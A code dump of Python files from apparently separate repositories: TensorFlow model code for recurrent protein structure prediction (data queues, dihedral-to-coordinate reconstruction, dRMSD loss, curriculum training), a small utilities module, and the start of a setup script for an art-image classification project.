Must be run once (and only once) before model is used.
Args:
evaluation_models: multiple models for eval
session: tf session
restore_if_checkpointed:
Returns:
session
"""
if not RGNModel._is_started:
# Checkpointing. Must be done here after all models have been instantiated,
# because evaluation models may introduce additional variables
self._saver = tf.train.Saver(
max_to_keep=self.config.io['max_checkpoints'],
keep_checkpoint_every_n_hours=self.config.io['checkpoint_every_n_hours'])
# variable tracking and summarization. it has to be done here
# after all models have been instantiated
model_names = set(
[model.config.io['name'] for model in evaluation_models] \
+ [self.config.io['name']])
if self.config.io['log_model_summaries']:
# add histogram and scalar summaries losses
for model_name in model_names:
for coll in ['tertiary_losses', 'losses']:
for node in tf.get_collection(model_name + '_' + coll):
tf.summary.scalar(
node.name,
node,
collections=[model_name + '_' + tf.GraphKeys.SUMMARIES])
if self.config.io['detailed_logs']:
# additional detailed summaries for losses
for model_name in model_names:
for coll in ['scess', 'matches', 'drmsdss', tf.GraphKeys.ACTIVATIONS]:
for node_or_named_output in tf.get_collection(model_name + '_' + coll):
if type(node_or_named_output) is tf.Tensor:
tf.summary.histogram(
node_or_named_output.name,
node_or_named_output,
collections=[model_name + '_' + tf.GraphKeys.SUMMARIES])
elif type(node_or_named_output) is layers.utils.NamedOutputs:
tf.summary.histogram(
node_or_named_output[1].name,
node_or_named_output[1],
collections=[model_name + '_' + tf.GraphKeys.SUMMARIES])
# summaries for trainable variables and their activations
for var in tf.trainable_variables():
tf.summary.histogram(var.name, var)
layers.summarize_activations()
# add housekeeping training ops that merge and write summaries
self._summary_writer = tf.summary.FileWriter(
self.config.io['logs_directory'])
self._diagnostic_ops.update({
'global_step': self._global_step,
# leftovers not covered by model-specific 'summaries'
'base_merged_summaries_op': tf.summary.merge_all(),
'merged_summaries_op': tf.summary.merge_all(
self.config.io['name'] + '_' + tf.GraphKeys.SUMMARIES)})
# ditto for evaluation models
for model in evaluation_models:
if model.mode == 'evaluation':
model._summary_writer = self._summary_writer
model._last_evaluation_ops.update({
'global_step': self._global_step,
'merged_summaries_op': tf.summary.merge_all(
model.config.io['name'] + '_' + tf.GraphKeys.SUMMARIES)})
# start session with appropriate device settings if no Session is passed
if self.config.computing['fill_gpu']:
gpu_fraction = None
else:
gpu_fraction = self.config.computing['gpu_fraction']
if session is None:
session = tf.Session(
config=tf.ConfigProto(
allow_soft_placement=False,
inter_op_parallelism_threads=self.config.computing['num_cpus'],
intra_op_parallelism_threads=self.config.computing['num_cpus'],
gpu_options=tf.GPUOptions(
per_process_gpu_memory_fraction=gpu_fraction,
allow_growth=self.config.computing['allow_gpu_growth'])))
# retrieve latest checkpoint, if any
latest_checkpoint = tf.train.latest_checkpoint(
self.config.io['checkpoints_directory'])
# restore latest checkpoint if found, initialize from scratch otherwise.
if not restore_if_checkpointed or latest_checkpoint is None:
tf.global_variables_initializer().run(session=session)
tf.local_variables_initializer().run(session=session)
else:
self._saver.restore(session, latest_checkpoint)
tf.local_variables_initializer().run(session=session)
# start coordinator and queueing threads
self._threads = tf.train.start_queue_runners(
sess=session, coord=self._coordinator)
RGNModel._is_started = True
# expose new methods and hide old ones
self.train = self._train
self.diagnose = self._diagnose
self.save = self._save
self.is_done = self._is_done
self.current_step = self._current_step
self.finish = self._finish
del self.start
return session
else:
raise RuntimeError('Model already started.')
def _save(self, session):
"""Checkpoints current model.
Args:
session: tf session
Returns:
tf saver
"""
checkpoints_dir = self.config.io['checkpoints_directory']
if not os.path.exists(checkpoints_dir):
os.makedirs(checkpoints_dir)
saver = self._saver.save(
session,
checkpoints_dir,
global_step=self._global_step)
return saver
def _is_done(self):
"""Returns True if training is finished, False otherwise. """
return self._coordinator.should_stop()
def _current_step(self, session):
"""Returns the current global step. """
return session.run(self._global_step)
def _finish(self, session, save=True, close_session=True, reset_graph=True):
""" Instructs the model to shutdown.
Returns:
None
"""
self._coordinator.request_stop()
self._coordinator.join(self._threads)
if save:
self.save(session)
if self.config.io['log_model_summaries']:
self._summary_writer.close()
if close_session:
session.close()
if reset_graph:
tf.reset_default_graph()
RGNModel._num_models = 0
RGNModel._is_started = False
del self.train, self.diagnose, self.save, \
self.is_done, self.current_step, self.finish
### Private functions
# Strictly used internally for RGNModel
# For TF-based ones, they do not carry out proper scoping
# of their internals, as what they produce is meant to be dropped in the main TF
# graph. They are often stateful, producing TF variables that are used by other
# parts of RGNModel. However their behavior is still transparent in the sense
# that they're only passed parameters, not actual TF nodes or ops, and return
# everything that needs to be acted upon by RGNModel. So they don't modify
# the state of anything that's passed to them.
def _device_function_constructor(functions_on_devices={}, default_device=''):
"""Place each operation on the most optimal device.
Args:
functions_on_devices: dictionary mapping device to operation
Returns:
device placement function
"""
def device_function(op):
# can't depend on ordering of items in dicts
for device, funcs in functions_on_devices.items():
if any(((func in op.name) \
or any(func in node.name for node in op.inputs)) for func in funcs):
return device
else:
return default_device
return device_function
def _dataflow(config, max_length):
"""Creates TF queues and nodes for inputting and batching data.
Returns only tensors.
Args:
config: config dict containing io, initialization, optimization, queuing
max_length: maximum seqence length
Returns:
ids: string identifier of records
primaries: [NUM_STEPS, BATCH_SIZE, NUM_AAS]
evolutionaries: [NUM_STEPS, BATCH_SIZE, NUM_EVO_ENTRIES]
secondaries: [NUM_STEPS, BATCH_SIZE]
tertiaries: [(NUM_STEPS - NUM_EDGE_RESIDUES) x NUM_DIHEDRALS, BATCH_SIZE, NUM_DIMENSIONS]
masks: [NUM_STEPS - NUM_EDGE_RESIDUES, NUM_STEPS - NUM_EDGE_RESIDUES, BATCH_SIZE]
num_stepss: max length in the batch
"""
# files
if config['data_files'] is not None:
files = config['data_files']
else:
files = glob(config['data_files_glob'])
# files queue
file_queue = tf.train.string_input_producer(
files,
num_epochs=config['num_epochs'],
shuffle=config['shuffle'],
seed=config['queue_seed'],
capacity=config['file_queue_capacity'],
name='file_queue')
# read instance
inputs = read_protein(
file_queue,
max_length,
config['num_edge_residues'],
config['num_evo_entries'])
# randomization
# https://github.com/tensorflow/tensorflow/issues/5147#issuecomment-271086206
if config['shuffle']:
dtypes = list([x.dtype for x in inputs])
shapes = list([x.get_shape() for x in inputs])
randomizer_queue = tf.RandomShuffleQueue(
capacity=config['batch_queue_capacity'],
min_after_dequeue=config['min_after_dequeue'],
dtypes=dtypes,
seed=config['queue_seed'],
name='randomization_queue')
randomizer_enqueue_op = randomizer_queue.enqueue(inputs)
randomizer_qr = tf.train.QueueRunner(
randomizer_queue,
[randomizer_enqueue_op])
tf.add_to_collection(tf.GraphKeys.QUEUE_RUNNERS, randomizer_qr)
inputs = randomizer_queue.dequeue()
for tensor, shape in zip(inputs, shapes):
tensor.set_shape(shape)
num_steps, keep = inputs[-2:]
# bucketing
if config['bucket_boundaries'] is not None:
batch_fun = tf.contrib.training.bucket_by_sequence_length
batch_kwargs = {'input_length': num_steps,
'bucket_boundaries': config['bucket_boundaries'],
'capacity': config['batch_queue_capacity'] / config['batch_size']}
sel_slice = 1
else:
batch_fun = tf.train.maybe_batch
batch_kwargs = {'capacity': config['batch_queue_capacity']}
sel_slice = slice(len(inputs) - 1)
# batching
inputs = batch_fun(
tensors=list(inputs)[:-1],
keep_input=keep,
dynamic_pad=True,
batch_size=config['batch_size'],
name='batching_queue',
**batch_kwargs)
ids, primaries_batch_major, evolutionaries_batch_major, \
secondaries_batch_major, tertiaries_batch_major, \
masks_batch_major, num_stepss = inputs[sel_slice]
# transpose to time_step major
# primary sequences (one-hot sequences of amino acids)
# [NUM_STEPS, BATCH_SIZE, NUM_AAS]
primaries = tf.transpose(
primaries_batch_major,
perm=(1, 0, 2),
name='primaries')
# evolutionary sequences
# (multi-dim evolutionary profiles of amino acid propensities)
# [NUM_STEPS, BATCH_SIZE, NUM_EVO_ENTRIES]
evolutionaries = tf.transpose(
evolutionaries_batch_major,
perm=(1, 0, 2),
name='evolutionaries')
# secondary sequences (sequences of DSSP classes)
# [NUM_STEPS, BATCH_SIZE]
secondaries = tf.transpose(
secondaries_batch_major,
perm=(1, 0),
name='secondaries')
# tertiary sequences (sequences of 3D coordinates)
# [(NUM_STEPS - NUM_EDGE_RESIDUES) x NUM_DIHEDRALS, BATCH_SIZE, NUM_DIMENSIONS]
tertiaries = tf.transpose(
tertiaries_batch_major,
perm=(1, 0, 2),
name='tertiaries')
# mask matrix for each datum that masks meaningless distances.
# [NUM_STEPS - NUM_EDGE_RESIDUES, NUM_STEPS - NUM_EDGE_RESIDUES, BATCH_SIZE]
masks = tf.transpose(
masks_batch_major,
perm=(1, 2, 0),
name='masks')
# assign names to the nameless
ids = tf.identity(ids, name='ids')
num_stepss = tf.identity(num_stepss, name='num_stepss')
return ids, primaries, evolutionaries, secondaries, tertiaries, masks, num_stepss
def _inputs(config, primaries, evolutionaries):
"""Returns final concatenated input for use in recurrent layer.
Args:
config: dictionary of parameters
primaries: [NUM_STEPS, BATCH_SIZE, NUM_AAS]
evolutionaries: [NUM_STEPS, BATCH_SIZE, NUM_EVO_ENTRIES]
Returns:
concated inputs of shape [NUM_STEPS, BATCH_SIZE, XXXX]
where XXXX is one of:
NUM_AAS
NUM_EVO_ENTRIES
NUM_AAS + NUM_EVO_ENTRIES
"""
inputs_list = ([primaries] if config['include_primary'] else []) \
+ ([evolutionaries * config['evolutionary_multiplier']] \
if config['include_evolutionary'] else [])
if inputs_list is not []:
inputs = tf.concat(inputs_list, 2, name='inputs')
else:
raise RuntimeError('Must include either primaries or evolutionaries inputs.')
return inputs
def _weights(config, masks, curriculum_step=None):
"""Creates dRMSD weights.
Mask meaningless (missing or longer than sequence residues)
pairwise distances and incorporate the state of the curriculum to
differentially weigh pairwise distances based on their proximity.
Args:
config: dict of configurations
masks: [LEN, LEN, BATCH_SIZE]
curriculum_step: tf scalar
Returns:
masked_weights: [MAX_SEQ_LENGTH, MAX_SEQ_LENGTH]
flat_curriculum_weights: [MAX_SEQ_LENGTH - 1]
"""
if config['atoms'] == 'c_alpha':
# no loss-based curriculum
if config['mode'] != 'loss':
# create fixed weighting matrix that weighs all distances equally.
# minus one factor is there because we ignore self-distances.
flat_curriculum_weights = np.ones(
config['num_steps'] - config['num_edge_residues'] - 1,
dtype='float32')
elif config['mode'] == 'loss' and curriculum_step is not None:
# create appropriate weights based on curriculum parameters and current step.
flat_curriculum_weights = curriculum_weights(
base=curriculum_step,
slope=config['slope'],
max_seq_length=config['num_steps'] - config['num_edge_residues'])
else:
raise RuntimeError('Curriculum step tensor not supplied.')
# weighting matrix for entire batch that accounts for curriculum weighting.
# [NUM_STEPS - NUM_EDGE_RESIDUES, NUM_STEPS - NUM_EDGE_RESIDUES]
unnormalized_weights = weighting_matrix(
flat_curriculum_weights,
name='unnormalized_weights')
# create final weights by multiplying with masks and normalizing.
mask_length = tf.shape(masks)[0]
unnormalized_masked_weights = masks * unnormalized_weights[:mask_length, :mask_length, tf.newaxis]
masked_weights = tf.div(
unnormalized_masked_weights,
tf.reduce_sum(unnormalized_masked_weights, axis=[0, 1]),
name='weights')
return masked_weights, flat_curriculum_weights
else:
raise NotImplementedError('Model only supports C alpha atoms for the loss function.')
def _alphabet(mode, config):
"""Creates alphabet for alphabetized dihedral prediction.
Args:
mode: train or predict
config: dict of configs
Returns:
tf alphabet variable (can be trainable)
[ALPHABET_SIZE, NUM_DIHEDRALS]
"""
# prepare initializer
if config['alphabet'] is not None:
# user-defined alphabet
alphabet_initializer = tf.constant_initializer(config['alphabet'])
else:
# random initialization
alphabet_initializer = dict_to_init(
config['alphabet_init'],
config['alphabet_seed'])
# alphabet variable, possibly trainable
alphabet = tf.get_variable(
name='alphabet',
shape=[config['alphabet_size'], NUM_DIHEDRALS],
initializer=alphabet_initializer,
trainable=config['alphabet_trainable']) # [OUTPUT_SIZE, NUM_DIHEDRALS]
# add to WEIGHTS collection if trainable
if mode == 'training' and config['alphabet_trainable']:
tf.add_to_collection(tf.GraphKeys.WEIGHTS, alphabet)
return alphabet
def _dihedrals(mode, config, inputs, alphabet=None):
""" Converts internal representation into dihedral angles.
The optional argument alphabet does not determine whether an alphabet
should be created or not--that's controlled by config. Instead the
option allows the reuse of an existing alphabet.
Args:
mode: train or predict
config: dict of parameters
inputs: inputs to feed
alphabet: s
Returns:
[NUM_STEPS, BATCH_SIZE, NUM_DIHEDRALS]
"""
is_training = (mode == 'training')
# output size for linear transform layer (OUTPUT_SIZE)
output_size = config['alphabet_size'] \
if config['is_alphabetized'] \
else NUM_DIHEDRALS
# set up non-linear dihedrals layer(s) if requested
nonlinear_out_proj_size = config['recurrent_nonlinear_out_proj_size']
if nonlinear_out_proj_size is not None:
if config['recurrent_nonlinear_out_proj_normalization'] \
== 'batch_normalization':
nonlinear_out_proj_normalization_fn = layers.batch_norm
nonlinear_out_proj_normalization_fn_opts = {
'center': True,
'scale': True,
'decay': 0.9,
'epsilon': 0.001,
'is_training': tf.constant(is_training),
'scope': 'nonlinear_out_proj_batch_norm',
'outputs_collections': config['name'] + '_' + tf.GraphKeys.ACTIVATIONS}
elif config['recurrent_nonlinear_out_proj_normalization'] \
== 'layer_normalization':
nonlinear_out_proj_normalization_fn = layers.layer_norm
nonlinear_out_proj_normalization_fn_opts = {
'center': True,
'scale': True,
'scope': 'nonlinear_out_proj_layer_norm',
'outputs_collections': config['name'] + '_' + tf.GraphKeys.ACTIVATIONS}
else:
nonlinear_out_proj_normalization_fn = None
nonlinear_out_proj_normalization_fn_opts = None
nonlinear_out_proj_fn = {
'tanh': tf.tanh,
'relu': tf.nn.relu}[config['recurrent_nonlinear_out_proj_function']]
outputs = inputs
for idx, (layer_size, init) in enumerate(zip(
nonlinear_out_proj_size,
config['recurrent_nonlinear_out_proj_init'])):
recurrent_nonlinear_out_proj_init = dict_to_inits(
init,
config['recurrent_nonlinear_out_proj_seed'])
outputs = layers.fully_connected(
outputs,
layer_size,
scope='nonlinear_dihedrals_' + str(idx),
activation_fn=nonlinear_out_proj_fn,
normalizer_fn=nonlinear_out_proj_normalization_fn,
normalizer_params=nonlinear_out_proj_normalization_fn_opts,
weights_initializer=recurrent_nonlinear_out_proj_init['base'],
biases_initializer=recurrent_nonlinear_out_proj_init['bias'],
outputs_collections=config['name'] + '_' + tf.GraphKeys.ACTIVATIONS,
variables_collections={
'weights': [tf.GraphKeys.WEIGHTS],
'biases': [tf.GraphKeys.BIASES]})
dihedrals_inputs = outputs
# [NUM_STEPS, BATCH_SIZE, NONLINEAR_DIHEDRALS_LAYER_SIZE]
else:
dihedrals_inputs = inputs
# [NUM_STEPS, BATCH_SIZE, N x RECURRENT_LAYER_SIZE]
# N is 1 or 2 depending on bidirectionality
# set up linear transform variables
recurrent_out_proj_init = dict_to_inits(
config['recurrent_out_proj_init'],
config['recurrent_out_proj_seed'])
linear = layers.fully_connected(
dihedrals_inputs,
output_size,
activation_fn=None,
scope='linear_dihedrals',
weights_initializer=recurrent_out_proj_init['base'],
biases_initializer=recurrent_out_proj_init['bias'],
variables_collections={
'weights': [tf.GraphKeys.WEIGHTS],
'biases': [tf.GraphKeys.BIASES]},
outputs_collections=config['name'] + '_' + tf.GraphKeys.ACTIVATIONS)
# [NUM_STEPS, BATCH_SIZE, OUTPUT_SIZE]
# reduce to dihedrals, through an alphabet if specified
if config['is_alphabetized']:
# create alphabet if one is not already there
if alphabet is None:
alphabet = _alphabet(mode, config)
# angularize alphabet if specified
if config['is_angularized']:
alphabet = angularize(alphabet)
# batch or layer normalize linear inputs to softmax
# (stats are computed over all batches and timesteps, effectively flattened)
if config['alphabet_normalization'] == 'batch_normalization':
linear = layers.batch_norm(
linear,
center=True,
scale=True,
decay=0.999,
epsilon=0.001,
is_training=tf.constant(is_training),
scope='alphabet_batch_norm',
outputs_collections=config['name'] + '_' + tf.GraphKeys.ACTIVATIONS)
elif config['alphabet_normalization'] == 'layer_normalization':
linear = layers.layer_norm(
linear,
center=True,
scale=True,
scope='alphabet_layer_norm',
outputs_collections=config['name'] + '_' + tf.GraphKeys.ACTIVATIONS)
# softmax for linear to create angle mixtures
# [NUM_STEPS x BATCH_SIZE, OUTPUT_SIZE]
flattened_linear = tf.reshape(linear, [-1, output_size])
probs = tf.nn.softmax(
flattened_linear / config['alphabet_temperature'],
name='probs') # [NUM_STEPS x BATCH_SIZE, OUTPUT_SIZE]
tf.add_to_collection(
config['name'] + '_' + tf.GraphKeys.ACTIVATIONS,
probs)
# dropout alphabet if specified.
# I don't renormalize since final angle is invariant wrt overall scale.
if mode == 'training' and config['alphabet_keep_probability'] < 1:
probs = tf.nn.dropout(
probs,
config['alphabet_keep_probability'],
seed=config['dropout_seed'],
name='dropped_probs')
# form final dihedrals based on mixture of alphabetized angles
num_steps = tf.shape(linear)[0]
batch_size = linear.get_shape().as_list()[1]
# [NUM_STEPS x BATCH_SIZE, NUM_DIHEDRALS]
flattened_dihedrals = reduce_mean_angle(probs, alphabet)
# [NUM_STEPS, BATCH_SIZE, NUM_DIHEDRALS]
dihedrals = tf.reshape(
flattened_dihedrals,
[num_steps, batch_size, NUM_DIHEDRALS])
else:
# just linear
dihedrals = linear
# angularize if specified
if config['is_angularized']:
dihedrals = angularize(dihedrals)
# [NUM_STEPS, BATCH_SIZE, NUM_DIHEDRALS] (for both cases)
# add angle shift
dihedrals = tf.add(
dihedrals,
tf.constant(
config['angle_shift'],
dtype=tf.float32,
name='angle_shift'),
name='dihedrals')
return dihedrals
def _coordinates(config, dihedrals):
"""Converts dihedrals into full 3D structures.
Args:
config: config dict
dihedrals: [NUM_STEPS, BATCH_SIZE, NUM_DIHEDRALS]
Returns:
[NUM_STEPS x NUM_DIHEDRALS, BATCH_SIZE, NUM_DIMENSIONS]
"""
# converts dihedrals to points ready for reconstruction.
# [NUM_STEPS x NUM_DIHEDRALS, BATCH_SIZE, NUM_DIMENSIONS]
points = dihedral_to_point(dihedrals)
# converts points to final 3D coordinates.
coordinates = point_to_coordinate(
points,
num_fragments=config['num_reconstruction_fragments'],
parallel_iterations=config['num_reconstruction_parallel_iters'])
return coordinates
def _drmsds(config, coordinates, targets, weights):
"""Computes reduced weighted dRMSD loss (as specified by weights).
Computed between predicted tertiary structures and targets.
Args:
config: dict of config
coordinates: coordinates of predicted
targets: target coordinates
weights: weights of each point
Returns:
dRMSD for each instance
"""
# lose end residues if desired
if config['num_edge_residues'] > 0:
coordinates = coordinates[:-(config['num_edge_residues'] * NUM_DIHEDRALS)]
# if only c_alpha atoms are requested then subsample
# starts at 1 because c_alpha atoms are the second atoms
if config['atoms'] == 'c_alpha':
# [NUM_STEPS - NUM_EDGE_RESIDUES, BATCH_SIZE, NUM_DIMENSIONS]
coordinates = coordinates[1::NUM_DIHEDRALS]
# [NUM_STEPS - NUM_EDGE_RESIDUES, BATCH_SIZE, NUM_DIMENSIONS]
targets = targets[1::NUM_DIHEDRALS]
# compute per structure dRMSDs
drmsds = drmsd(
coordinates,
targets,
weights,
name='drmsds') # [BATCH_SIZE]
# add to relevant collections for summaries, etc.
if config['log_model_summaries']:
tf.add_to_collection(config['name'] + '_drmsdss', drmsds)
return drmsds
def _reduce_loss_quotient(config, losses, masks, group_filter, name_prefix=''):
"""Reduces loss according to normalization order.
Args:
config: config dict
losses: batch of losses
masks: batch of masks
group_filter: mask that filters out some losses
name_prefix: name
Returns:
numerator: TF scalar
denominator: TF scalar
"""
normalization = config['tertiary_normalization']
num_edge_residues = config['num_edge_residues']
max_seq_length = config['num_steps']
# will give problematic results if all entries are removed
losses_filtered = tf.boolean_mask(losses, group_filter)
for case in switch(normalization):
if case('zeroth'):
loss_factors = tf.ones_like(losses_filtered)
elif case ('first'):
loss_factors = tf.boolean_mask(
effective_steps(masks, num_edge_residues),
group_filter)
fixed_denominator_factor = float(
max_seq_length - num_edge_residues)
elif case ('second'):
eff_num_stepss = tf.boolean_mask(
effective_steps(masks, num_edge_residues),
group_filter)
loss_factors = (tf.square(eff_num_stepss) - eff_num_stepss) / 2.0
fixed_denominator_factor = float(max_seq_length - num_edge_residues)
fixed_denominator_factor = ((fixed_denominator_factor ** 2) \
- fixed_denominator_factor) / 2.0
numerator = tf.reduce_sum(
loss_factors * losses_filtered,
name=name_prefix + '_numerator')
if config['batch_dependent_normalization'] \
or normalization == 'zeroth':
denominator = tf.reduce_sum(
loss_factors,
name=name_prefix + '_denominator')
else:
denominator = tf.multiply(
tf.cast(tf.size(loss_factors), tf.float32),
fixed_denominator_factor,
name=name_prefix + '_denominator')
return numerator, denominator
def _accumulate_loss(config, numerator, denominator, name_prefix=''):
"""Constructs ops to accumulate and reduce loss.
It maintain a memory of lowest loss achieved.
Args:
config: dict of config
numerator: tf scalar
denominator: tf scalar
name_prefix: name
Returns:
accumulated_loss:
min_loss_achieved:
min_loss_op: operation to find min
update_op:
reduce_op:
"""
if config['num_evaluation_invocations'] == 1:
# return simple loss
accumulated_loss = tf.divide(
numerator,
denominator,
name=name_prefix)
update_op = reduce_op = tf.no_op()
else:
# create accumulator variables.
# note that tf.Variable uses name_scope (not variable_scope) for naming,
# which is what's desired in this instance
numerator_accumulator = tf.Variable(
initial_value=0.,
trainable=False,
name=name_prefix + '_numerator_accumulator')
denominator_accumulator = tf.Variable(
initial_value=0.,
trainable=False,
name=name_prefix + '_denominator_accumulator')
# accumulate
with tf.control_dependencies([
numerator,
denominator,
numerator_accumulator,
denominator_accumulator]):
accumulate_numerator = tf.assign_add(
numerator_accumulator,
numerator)
accumulate_denominator = tf.assign_add(
denominator_accumulator,
denominator)
update_op = tf.group(
accumulate_numerator,
accumulate_denominator,
name=name_prefix + '_accumulate_op')
# divide to get final quotient
with tf.control_dependencies([update_op]):
accumulated_loss = tf.divide(
numerator_accumulator,
denominator_accumulator,
name=name_prefix + '_accumulated')
# zero accumulators
with tf.control_dependencies([accumulated_loss]):
zero_numerator = tf.assign(numerator_accumulator, 0.)
zero_denominator = tf.assign(denominator_accumulator, 0.)
reduce_op = tf.group(
zero_numerator,
zero_denominator,
name=name_prefix + '_reduce_op')
min_loss_achieved = tf.Variable(
initial_value=float('inf'),
trainable=False,
name='min_' + name_prefix + '_achieved')
min_loss_op = tf.assign(
min_loss_achieved,
tf.reduce_min([min_loss_achieved, accumulated_loss]),
name='min_' + name_prefix + '_achieved_op')
with tf.control_dependencies([min_loss_op]):
min_loss_achieved = tf.identity(min_loss_achieved)
return accumulated_loss, min_loss_achieved, min_loss_op, update_op, reduce_op
def _training(config, loss):
"""Creates loss optimizer and returns minimization op.
Args:
config: configuration dict
loss: TF scalar
Returns:
global_step: applying the gradients
minimize_op: TF op
grads_and_vars_dict: dict
"""
optimizer_args = lambda o: \
o.__init__.__code__.co_varnames[:o.__init__.__code__.co_argcount]
# select appropriate optimization function and construct arg list based on config
optimizer_func = {
'steepest': tf.train.GradientDescentOptimizer, # doesn't support momentum, unlike autograd
'rmsprop': tf.train.RMSPropOptimizer,
'adam': tf.train.AdamOptimizer,
'momentum': tf.train.MomentumOptimizer,
'adagrad': tf.train.AdagradOptimizer,
'adadelta': tf.train.AdadeltaOptimizer}[config['optimizer']]
optimizer_params = config.keys() & set(optimizer_args(optimizer_func))
optimizer_params_and_values = {param: config[param] for param in optimizer_params}
optimizer = optimizer_func(**optimizer_params_and_values)
# obtain and process gradients
grads_and_vars = optimizer.compute_gradients(loss)
threshold = config['gradient_threshold']
# print(grads_and_vars[0])
# from sys import exit
# exit()
# grads_and_vars = tf.Print(grads_and_vars, [grads_and_vars])
if threshold != float('inf'):
for case in switch(config['rescale_behavior']):
if case('norm_rescaling'):
grads, _ = tf.clip_by_global_norm(
[g for g, _ in grads_and_vars],
threshold)
vars_ = [v for _, v in grads_and_vars]
grads_and_vars = list(zip(grads, vars_))
elif case('hard_clipping'):
grads_and_vars = [
(tf.clip_by_value(g, -threshold, threshold), v)\
for g, v in grads_and_vars]
# apply gradients and return stepping op
global_step = tf.get_variable(
initializer=tf.constant_initializer(0),
shape=[],
trainable=False,
dtype=tf.int32,
name='global_step')
minimize_op = optimizer.apply_gradients(
grads_and_vars,
global_step=global_step)
# dict useful for diagnostics
grads_and_vars_dict = {}
grads_and_vars_dict.update({
('g' + str(i)): g for i, (g, _) in enumerate(grads_and_vars)})
grads_and_vars_dict.update({
('v' + str(i)): v for i, (_, v) in enumerate(grads_and_vars)})
# print(grads_and_vars_dict)
return global_step, minimize_op, grads_and_vars_dict
def _history(config, loss, loss_history=None,
scaling_factor=LOSS_SCALING_FACTOR):
"""Creates op for loss history updating.
Args:
config: dict
loss: TF scalar
loss_history: Tensor of history
scaling_factor:
Returns:
Operation
"""
# op for shifting history, i.e. adding new loss, dropping oldest one
# new_history = tf.concat(
# [loss_history[1:],
# tf.expand_dims(loss * scaling_factor, 0)],
# 0)
new_history = tf.concat(
[loss_history[1:],
[loss * scaling_factor]],
0)
with tf.control_dependencies([new_history]):
update_op = tf.assign(
loss_history,
new_history,
name='update_curriculum_history_op')
return update_op
def _curriculum(config, step, loss_history, dependency_ops):
"""Creates TF ops for maintaining and advancing the curriculum.
Args:
config: config dict
step: tf scalar
loss_history: 1D tensor
dependency_ops: operations to perform beforehand
Returns:
curriculum update
"""
# assign appropriate curriculum increment value
for case in switch(config['behavior']):
if case('fixed_rate'):
# fixed rate, always return same number
increment = tf.constant(
config['rate'],
name='curriculum_increment')
elif case('loss_threshold'):
# return fixed increment if last loss is below threshold, zero otherwise
increment_pred = tf.less(
loss_history[-1],
config['threshold'],
name='curriculum_predicate')
full_increment_func = lambda: tf.constant(
config['rate'],
name='full_curriculum_increment')
zero_increment_func = lambda: tf.constant(
0.0,
name='zero_curriculum_increment')
increment = tf.cond(
increment_pred,
full_increment_func,
zero_increment_func)
elif case('loss_change'):
# predicate for increment type
increment_pred = tf.not_equal(
loss_history[0],
DUMMY_LOSS,
name='curriculum_predicate')
# increment function for when loss history is still
def full_increment_func():
lin_seq = tf.expand_dims(
tf.linspace(0., 1., config['change_num_iterations']),
1)
ls_matrix = tf.concat([tf.ones_like(lin_seq), lin_seq], 1)
ls_rhs = tf.expand_dims(loss_history, 1)
ls_slope = tf.matrix_solve_ls(ls_matrix, ls_rhs)[1, 0]
full_increment = tf.div(
config['rate'],
tf.pow(tf.abs(ls_slope) + 1,
config['sharpness']),
name='full_curriculum_increment')
return full_increment
# dummy increment function for when loss history is changing rapidly
zero_increment_func = lambda: tf.constant(
0.0,
name='zero_curriculum_increment')
# final conditional increment
increment = tf.cond(
increment_pred,
full_increment_func,
zero_increment_func)
# create updating op. the semantics are such that
# training / gradient update is first performed
# before the curriculum is incremented.
with tf.control_dependencies(dependency_ops):
update_op = tf.assign_add(
step,
increment,
name='update_curriculum_op')
return update_op
```
#### File: UTGN/model/utils.py
```python
import numpy as np
import tensorflow as tf
from ast import literal_eval
class switch(object):
"""Switch iterator.
Attributes:
value: input value to test.
fall: whether to stop
"""
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args:
self.fall = True
return True
else:
return False
def merge_dicts(*dict_args):
"""Merges arbitrary number of dicts.
Gives precedence to latter dicts.
Args:
*dict_arg: arbitrary number of dicts
Returns:
a single merged dict
"""
result = {}
for dictionary in dict_args:
result.update(dictionary)
return result
def ops_to_dict(session, ops):
"""Converts canonical dict of TF ops to an actual dict.
Runs ops first.
Args:
session: tf session
ops: dict mapping name to tf operation
Returns:
dict
"""
dict_ = dict(list(zip(list(ops.keys()), session.run(list(ops.values())))))
return dict_
def cum_quantile_positions(weights, quantiles=np.linspace(0.25, 0.99, 4)):
""" Computes cumulative quantiles from curriculum weights. """
if len(weights) != 0:
return [next(x[0] + 1 for x
in enumerate(np.cumsum(weights / sum(weights))) if x[1] > p)
for p in quantiles]
else:
return []
def dict_to_init(dict_, seed=None, dtype=tf.float32):
"""Decide the appropriate initializer.
Args:
dict_: config dict
seed: random seed
dtype: datatype
Returns:
TF initialization
"""
init_center = dict_.get('center', 0.0)
init_range = dict_.get('range', 0.01)
init_dist = dict_.get('dist', 'gaussian')
init_scale = dict_.get('scale', 1.0)
init_mode = dict_.get('mode', 'fan_in') # also accepts fan_out, fan_avg
for case in switch(init_dist):
if case('gaussian'):
init = tf.initializers.random_normal(init_center,
init_range,
seed=seed,
dtype=dtype)
elif case('uniform'):
init = tf.initializers.random_uniform(init_center - init_range,
init_center + init_range,
seed=seed,
dtype=dtype)
elif case('orthogonal'):
init = tf.initializers.orthogonal(init_scale,
seed=seed,
dtype=dtype)
elif case('gaussian_variance_scaling'):
init = tf.initializers.variance_scaling(init_scale,
init_mode,
'normal',
seed=seed,
dtype=dtype)
elif case('uniform_variance_scaling'):
init = tf.initializers.variance_scaling(init_scale,
init_mode,
'uniform',
seed=seed,
dtype=dtype)
return init
def dict_to_inits(dict_, seed=None, dtype=tf.float32):
"""Decide appropriate initializer.
Args:
dict_: dict of config dicts
seed: random seed
dtype: datatype
Returns:
dict of TF initialization
"""
inits = {k: dict_to_init(v, seed, dtype) for k, v in dict_.items()}
return inits
def count_trainable_params():
"""Count the total trainable parameters. """
total_params = [np.prod(v.get_shape().as_list())
for v in tf.trainable_variables()]
return np.sum(total_params)
``` |
{
"source": "JinLi711/Web-Scraping-Yelp",
"score": 2
} |
#### File: Art_Recognition/trial_run/setup.py
```python
import os
import matplotlib.pyplot as plt
import numpy as np
# image processing
from PIL import Image
import skimage.io
import skimage.transform
#======================================================================
# Default Variable Assignments
#======================================================================
train_path = "art_images/dataset_updated/training_set"
test_path = "art_images/dataset_updated/validation_set"
corrupt_path = "art_images/dataset_updated/training_set_corrupted"
categories = ['drawings', 'engraving', 'iconography', 'painting', 'sculpture']
category_embeddings = {
'drawings': 0,
'engraving': 1,
'iconography': 2,
'painting': 3,
'sculpture': 4
}
width = 96 # 368
height = 96 # 352
n_channels = 3
#======================================================================
